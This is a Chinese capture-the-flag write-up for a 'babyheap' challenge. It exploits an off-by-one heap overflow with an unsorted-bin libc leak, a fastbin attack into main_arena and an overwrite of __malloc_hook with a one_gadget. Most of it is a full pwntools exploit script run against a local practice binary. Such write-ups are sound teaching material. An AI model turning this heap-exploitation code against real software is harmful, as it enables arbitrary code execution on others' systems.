漏洞位置
主要在update处会有一字节溢出漏洞
利用思路
题目保护机制全开
申请不对齐0x10(0x_8)的堆,再利用one_byte_off可修改下一个堆块的size位。大体思路是利用fastbin attack,但由于是full relro,所以got表不可写,所以考虑用one_gadget覆盖malloc_hook。第一步-leak libc_base:布置出叠在一起的两个堆,修改后一个堆块到unsor tbin的范围内free掉后再view前一个堆块可泄露出libc的基址。第二步-fastbin attack:由于在malloc_hook上方没有发现合适的size位用来伪造,所以准备直接把size当成堆的首地址,让其进入main_arena中的fastbinY中,然后再构造fastbin attack修改last reminder地址到malloc_hook上方,再次malloc时即可申请到malloc_hook并修改。
在做堆题时,由于会构造许多伪堆块,所以我们应该对每个真实的堆块、指针以及编号进行备注,这样会提高调试的效率,也不容易弄混淆。在进行关键步骤时,可每做完一次操作马上观察是否达到了预期的效果。
my-exp
from pwn import *
local = 1
one_gadget = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
if local:
p = process('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
print 'time is up;'
def allocate(size):
p.recv(1024)
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))
def update(index , size , content):
p.recv(1024)
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(index))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.sendline(content)
def delete(index):
p.recv(1024)
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(index))
def view(index):
p.recv(1024)
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(index))
return p.recvuntil('\n')[:-1]
def debug():
print pidof(p)[0]
raw_input()
#step1 leak libc_base
allocate(0x18) #0 00
allocate(0x18) #1 20
allocate(0x18) #2 40
allocate(0x40) #3 60
allocate(0x18) #4 b0
allocate(0x58) #5 d0
update(0 , 0x19 , 'a' * 0x18 + '\x41')
delete(1)
allocate(0x30) #1 20
update(1 , 0x20 , '\x00' * 0x18 + '\x91' + '\x00' * 7)
delete(3)
delete(2)
aaa = view(1)
aaa = aaa.rstrip('\n')[-8:]
libc.address = u64(aaa) - 0x3c4b78
success('libc_base => ' + hex(libc.address))
dst_addr = libc.address + 0x3c4b40
success('dst_addr => ' + hex(dst_addr))
malloc_hook = libc.symbols['__malloc_hook']
success('malloc_hook => ' + hex(malloc_hook))
#step2 fastbin_attack to main_arena
allocate(0x58) #2 40
update(2 , 0x20 , '\x00' * 0x18 + '\x51' + '\x00' * 7)
allocate(0x20) #3 a0
update(3 , 0x10 , '\x00' * 0x8 + '\x21' + '\x00' * 7)
allocate(0x40) #6 60
update(6 , 0x40 , '\x00' * 0x38 + '\x31' + '\x00' * 7)
update(3 , 0x20 , '\x00' * 0x18 + '\x21' + '\x00' * 7)
update(5 , 0x10 , '\x00' * 8 + '\x51' + '\x00' * 7)
update(2 , 0x20 , '\x00' * 0x18 + '\x61' + '\x00' * 7)
delete(6)
update(2 , 0x28 , '\x00' * 0x18 + '\x61' + '\x00' * 7 + '\x41' + '\x00' * 7)
allocate(0x50) #6 60
allocate(0x30) #7 130
update(2 , 0x59 , '\x00' * 0x18 + '\x41' + '\x00' * 0x3f + '\x41')
delete(3)
allocate(0x38) #3 a0
update(3 , 0x29 , '\x00' * 0x28 + '\x41')
update(5 , 0x39 , '\x00' * 0x38 + '\x21')
delete(5)
update(3 , 0x38 , '\x00' * 0x28 + '\x41' + '\x00' * 7 + p64(dst_addr))
allocate(0x30) #5
allocate(0x30) #8
#step3 overwirte top_chunk_ptr above malloc_hook
update(8 , 0x30 , '\x00' * 0x28 + p64(malloc_hook - 0x10))
#step4 malloc a new chunk & overwrite malloc_hook to one_gadget
allocate(0x10) #9
update(9 , 0x8 , p64(libc.address + one_gadget[1]))
allocate(0x10)
#debug()
p.interactive()